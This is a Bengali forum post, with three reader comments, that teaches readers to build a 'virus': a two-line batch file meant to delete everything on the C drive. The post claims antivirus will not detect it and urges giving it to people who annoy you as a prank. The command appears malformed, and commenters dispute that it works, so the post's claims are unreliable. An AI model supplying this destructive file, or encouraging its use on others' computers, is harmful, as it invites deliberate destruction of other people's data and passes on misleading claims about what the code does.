নিজেই তৈরী করেন ভাইরাস...!! তাও আবার আনডিটেক্টেবল...!!

30
528

টিউনার পেইজে এটাই আমার প্রথম পোষ্ট। আর প্রথমেই শুরু করলাম আপাত দৃষ্টিতে সাধারন কিন্তু আসলে “বাঁশ” :mrgreen:  এরকম একটি ভাইরাস দিয়ে।বাঁশ দেখতে সোজা কিন্তু যে খায় সে বুঝে মজা।

প্রথমেই বলে নিচ্ছি, এটা অত্যন্ত শক্তিশালী একটি প্রোগ্রাম। এই প্রোগ্রাম দ্বারা কেউ ক্ষতিগ্রস্থ হলে আমি দায়ী নই। আর এটা নিজের পিসিতে কেউ ভুলেও ওপেন করবেন না।

প্রথমে নোটপ্যাড ওপেন করুন। নোটপ্যাডে নিচের কোডটি লিখুনঃ

@Echo off
Del C:\ *.* |y

এরপর এটি ankur.bat (ankur এর জায়গায় নিজের ইচ্ছেমত নাম দিতে পারেন) নামে সেইভ করুন।ব্যাস তৈরী হয়ে গেল আপনার ভাইরাস।

এবার বলি এটার কাজ। এই ব্যাচ ফাইলটি কেউ ওপেন করলে সাথে সাথে তার C ড্রাইভ মুছে যাবে। অর্থাৎ তার C ড্রাইভে রাখা সমস্ত ডাটা ডিলিট হয়ে যাবে।

এইটার আরেকটা মজা হল এটা কোনো এন্টিভাইরাস ভাইরাস হিসেবে ডিটেক্ট করবেনা। বিশ্বাস না হলে স্ক্যান করে দেখেন। :lol:

সো কেই হাংকি-পাংকি করলে এইটা তারে দিয়া দ্যান আর তামাশা দ্যাখেন। তয় আবার কইতাছি এইডা কেউ নিজের পিসিতে ওপেন কইরেননা। এইডা ওপেন কইরা কেউ ধরা খাইলে আমি কিন্তু কিছু জানিনা।

30 মন্তব্য

  1. অনেক আশা করে টিউনারপেজ এ সদস্য হয়েছিলাম কিন্তু এই সব ফালতু পোস্টের জন্য টিউটনার পেজে Log in করতে আর ইচ্ছে করে না। যত সব ফালতু……………………পোস্ট System Run থাকা অবস্থায় কখনও কি System ডিলেট হয়।

  2. সব সতর্কবানী সত্তেও আমি এইটা নিজের পিসিতে রান করাব। আমি পরিক্ষা করে দেখতে চাই আসলে ঠিক না বেঠিক, Gost দিয়ে Backup নেওয়া আছে। আমি কিন্তু জানি কম্পিউটার চালু অস্থায় System Drive format করা যায় না। তাই চেষ্টা করি দেখি হয় কিনা? যদি কাজ করে………………..ও-রে.. বা-প প প … …

  3. ভাই, C ড্রাইভের (উইন্ডোজ ফোল্ডারের) সকল ফাইল সাধারণত রিড-অনলি করা থাকে। অই সব ফাইল কোন ভাবেই ডিলিট করা যায়না। আপনি আপনার নিজের PC তে একবার চেষ্টা করে তারপর আমাদের মন্তব্যের জবাব দিবেন। অপেক্ষায় আছি…

একটি উত্তর ত্যাগ